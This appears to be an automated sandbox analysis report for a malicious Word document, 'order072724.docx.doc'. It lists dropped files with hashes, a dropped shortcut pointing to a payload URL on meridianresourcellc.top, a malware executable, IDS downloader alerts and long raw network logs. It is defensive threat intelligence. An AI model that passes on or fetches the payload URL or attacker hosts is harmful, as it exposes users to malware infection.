                                              SHA-512:1ACD3F7F018F538B4396A852486D68F91F8D1FE6B812F50AAF5BE9136D63EE3287F95E1F82CCB4ACF0E480EB5E610DBE248CEEDE3F8EEFCF8ADADB5C5D1B473E
                                              Malicious:false
                                              Preview:L..................F.... .......r.......r....P.......w...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......X....user.8......QK.X.X..*...&=....U...............A.l.b.u.s.....z.1......WE...Desktop.d......QK.X.WE.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....r.2..w...X.. .ORDER0~1.DOC..V.......WE..WE.*.........................o.r.d.e.r.0.7.2.7.2.4...d.o.c.x...d.o.c.......~...............-...8...[............?J......C:\Users\..#...................\\528110\Users.user\Desktop\order072724.docx.doc.+.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.o.r.d.e.r.0.7.2.7.2.4...d.o.c.x...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......528110..........D_....3N...W...9.W.e8..
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:MS Windows 95 Internet shortcut text (URL=<https://meridianresourcellc.top/swagodi.doc>), ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):69
                                              Entropy (8bit):4.626570204770473
                                              Encrypted:false
                                              SSDEEP:3:HRAbABGQYm2fYFHjGvRKVKNat:HRYFVm4Yh6JOUat
                                              MD5:4864A655882BCD4B9A581B677AFAA792
                                              SHA1:E18585174F42566473A25B467EBFC5A7E22255B1
                                              SHA-256:EDED0F94A9F63B3F7BCDE72C722DC338E4DE4E48C5E8BB972B3F5439510E0379
                                              SHA-512:3279A4A578FD476FF565351155F46E5F89BDF69B748C99DDBDA9E756F81CB08D0E3D27E04D2A7097EE04823F64AA706DB8B978944D5FAAAB9DF84A009AE4A4D3
                                              Malicious:true
                                              Preview:[InternetShortcut]..URL=https://meridianresourcellc.top/swagodi.doc..
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):162
                                              Entropy (8bit):2.4797606462020307
                                              Encrypted:false
                                              SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                              MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                              SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                              SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                              SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                              Malicious:false
                                              Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                              Category:dropped
                                              Size (bytes):2
                                              Entropy (8bit):1.0
                                              Encrypted:false
                                              SSDEEP:3:Qn:Qn
                                              MD5:F3B25701FE362EC84616A93A45CE9998
                                              SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                              SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                              SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                              Malicious:false
                                              Preview:..
                                              Process:C:\Users\user\AppData\Roaming\swagodi78811.scr
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):683016
                                              Entropy (8bit):7.9744561964387195
                                              Encrypted:false
                                              SSDEEP:12288:HsTnHaxBnGvHnutIognoP+wRYnS0qYVd1XXikKRj9l/klFck1zJstnkR:WaznWHfYFYnK8PXikKRnCc2dN
                                              MD5:C448536AEEA36B80A15D639E31C7B847
                                              SHA1:5225387E8D149E14A73F3D25A055B069750AEFCC
                                              SHA-256:490784A930FE7D630C926436C540441694C905A9CB1FE6B3C25D16C366D75492
                                              SHA-512:E51B95996A95C7FC9AE4206A76642D8C4B59062BB49BC54931BDC1FDA8A080F5F29451E71A3F63F2C3530D8D71B56F9E00482D38A6C645492932986523576F01
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):683016
                                              Entropy (8bit):7.9744561964387195
                                              Encrypted:false
                                              SSDEEP:12288:HsTnHaxBnGvHnutIognoP+wRYnS0qYVd1XXikKRj9l/klFck1zJstnkR:WaznWHfYFYnK8PXikKRnCc2dN
                                              MD5:C448536AEEA36B80A15D639E31C7B847
                                              SHA1:5225387E8D149E14A73F3D25A055B069750AEFCC
                                              SHA-256:490784A930FE7D630C926436C540441694C905A9CB1FE6B3C25D16C366D75492
                                              SHA-512:E51B95996A95C7FC9AE4206A76642D8C4B59062BB49BC54931BDC1FDA8A080F5F29451E71A3F63F2C3530D8D71B56F9E00482D38A6C645492932986523576F01
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):162
                                              Entropy (8bit):2.4797606462020307
                                              Encrypted:false
                                              SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                              MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                              SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                              SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                              SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                              Malicious:false
                                              Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                              File type:Microsoft Word 2007+
                                              Entropy (8bit):7.991473021388467
                                              TrID:
                                              • Word Microsoft Office Open XML Format document (49504/1) 58.23%
                                              • Word Microsoft Office Open XML Format document (27504/1) 32.35%
                                              • ZIP compressed archive (8000/1) 9.41%
                                              File name:order072724.docx.doc
                                              File size:96'005 bytes
                                              MD5:d89c00ac44e63c962db8c02cbf0bab93
                                              SHA1:2ac1b269e93b1a0c0068b68d8d1d4f9e4a5cc06a
                                              SHA256:5dc96311ffca3ae13e805020a61d276e2a2b1032e2ecc87a05f86c346e90d47c
                                              SHA512:088c3b2a514fb1e5c504b29eb86302b8e8787e26dc6f6b0ea13ad6916676f16dc2650aa9b2a571c48fe6628311bd25f4a509830fd718b6444dac82308402739c
                                              SSDEEP:1536:LMzw/hgP0QF6smQKEMzqsQtrm5rbXkvMtLQ6j7jfmMIGSzyn5ivkSVkkKLkJem5Y:o0Q8hjOXIrbXyMtE6j/EfvkS8LrQY
                                              TLSH:0793021159D92BEEC75E2875F1A1EF6DB2D68E9314731A08B070DE8E53348B3E712E18
                                              Icon Hash:2764a3aaaeb7bdbf
                                              Document Type:OpenXML
                                              Number of OLE Files:1
                                              Has Summary Info:
                                              Application Name:
                                              Encrypted Document:False
                                              Contains Word Document Stream:True
                                              Contains Workbook/Book Stream:False
                                              Contains PowerPoint Document Stream:False
                                              Contains Visio Document Stream:False
                                              Contains ObjectPool Stream:False
                                              Flash Objects Count:0
                                              Contains VBA Macros:False
Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
2024-07-26T23:45:45.269177+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 49187 | 80 | 192.168.2.22 | 158.101.44.242
2024-07-26T23:45:46.595188+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 49191 | 80 | 192.168.2.22 | 132.226.247.73
2024-07-26T23:45:47.482045+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 49193 | 443 | 192.168.2.22 | 188.114.97.3
2024-07-26T23:45:43.939318+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 49186 | 443 | 192.168.2.22 | 188.114.96.3
2024-07-26T23:45:45.672752+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 49189 | 443 | 192.168.2.22 | 188.114.96.3
2024-07-26T23:45:47.219644+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 49192 | 443 | 192.168.2.22 | 188.114.96.3
2024-07-26T23:45:34.439640+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 49171 | 80 | 192.168.2.22 | 132.226.247.73
2024-07-26T23:45:38.046315+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 49176 | 80 | 192.168.2.22 | 158.101.44.242
2024-07-26T23:45:35.862446+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 49174 | 80 | 192.168.2.22 | 193.122.130.0
2024-07-26T23:45:30.886952+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 49171 | 80 | 192.168.2.22 | 132.226.247.73
2024-07-26T23:45:39.432931+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 49177 | 80 | 192.168.2.22 | 193.122.6.168
2024-07-26T23:45:39.278729+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 49176 | 80 | 192.168.2.22 | 158.101.44.242
2024-07-26T23:45:42.289531+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 49182 | 80 | 192.168.2.22 | 193.122.6.168
2024-07-26T23:45:41.727950+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 49180 | 80 | 192.168.2.22 | 193.122.6.168
2024-07-26T23:45:34.870932+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 49173 | 443 | 192.168.2.22 | 188.114.97.3
2024-07-26T23:45:40.927537+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 49177 | 80 | 192.168.2.22 | 193.122.6.168
2024-07-26T23:45:21.214935+0200 | TCP | 2022053 | ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 | 443 | 49168 | 104.21.52.88 | 192.168.2.22
2024-07-26T23:45:39.742773+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 49179 | 443 | 192.168.2.22 | 188.114.97.3
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                              Jul 26, 2024 23:45:16.837630987 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:16.837687016 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:16.837737083 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:16.837793112 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:16.837842941 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:16.837899923 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:16.837949991 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:16.838006020 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:16.838051081 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:16.838108063 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:16.838526011 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:16.838579893 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:16.838629007 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:16.838704109 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:16.838748932 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:16.838804007 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:16.838849068 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:16.838907957 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:16.839412928 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:16.839474916 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:16.839488029 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:16.839540958 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:16.839549065 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:16.839559078 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:16.839597940 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:16.839610100 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:16.839662075 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:16.840709925 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:16.840806961 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:16.930639982 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:16.930830002 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:16.930917025 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:16.930917025 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:16.930954933 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:16.930984974 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:16.931022882 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:16.931022882 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:16.931132078 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:16.931194067 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:16.931282997 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:16.931351900 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:16.931433916 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:16.931499958 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:16.931587934 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:16.931654930 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:16.931747913 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:16.931814909 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:16.931919098 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:16.931979895 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:16.932071924 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:16.932133913 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:16.932243109 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:16.932300091 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:16.932820082 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:16.932898998 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:16.932975054 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:16.933033943 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:16.933274984 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:16.933348894 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:16.933661938 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:16.933720112 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:16.933814049 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:16.933866024 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.027832031 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.028034925 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.028100014 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.028100014 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.028167009 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.028228998 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.028229952 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.028256893 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.028289080 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.028314114 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.028404951 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.028465986 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.028575897 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.028637886 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.028726101 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.028781891 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.028867006 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.028927088 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.029022932 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.029077053 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.029167891 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.029222965 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.029278040 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.029335022 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.029345989 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.029390097 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.029479980 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.029529095 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.029728889 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.029787064 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.029908895 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.029962063 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.030101061 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.030155897 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.030312061 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.030366898 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.030541897 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.030596972 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.030612946 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.030657053 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.030913115 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.030983925 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.031128883 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.031182051 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.031426907 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.031485081 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.031502008 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.031547070 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.031887054 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.031939983 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.032082081 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.032135010 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.032582045 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.032622099 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.032644987 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.032663107 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.032691002 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.032713890 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.122159004 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.122272968 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.122278929 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.122308969 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.122333050 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.122350931 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.122529984 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.122596979 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.122659922 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.122725964 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.125415087 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.125488043 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.125545025 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.125607014 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.125829935 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.125897884 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.125962019 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.126017094 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.126174927 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.126231909 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.126301050 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.126357079 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.126528025 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.126595974 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.126660109 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.126717091 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.127320051 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.127382994 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.127444983 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.127506971 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.128088951 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.128154039 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.128218889 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.128282070 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.217129946 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.217295885 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.217385054 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.217386007 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.217423916 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.217464924 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.217534065 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.217587948 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.217650890 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.217657089 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.217703104 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.218209028 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.218341112 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.218365908 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.218379021 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.218408108 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.218417883 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.218926907 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.218988895 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.219027042 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.219069958 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.219367027 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.219415903 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.219420910 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.219433069 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.219465971 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.220172882 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.222732067 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.222790003 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.222826958 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.222847939 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.222863913 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.222893953 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.223304987 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.223359108 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.223361969 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.223371983 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.223403931 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.223937035 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.223997116 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.224000931 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.224009037 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.224042892 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.311239004 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.311306000 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.311374903 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.311376095 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.311427116 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.311471939 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.311490059 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.311754942 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.311827898 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.311880112 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.311947107 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.312736988 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.312800884 CEST49166443192.168.2.22104.21.52.88
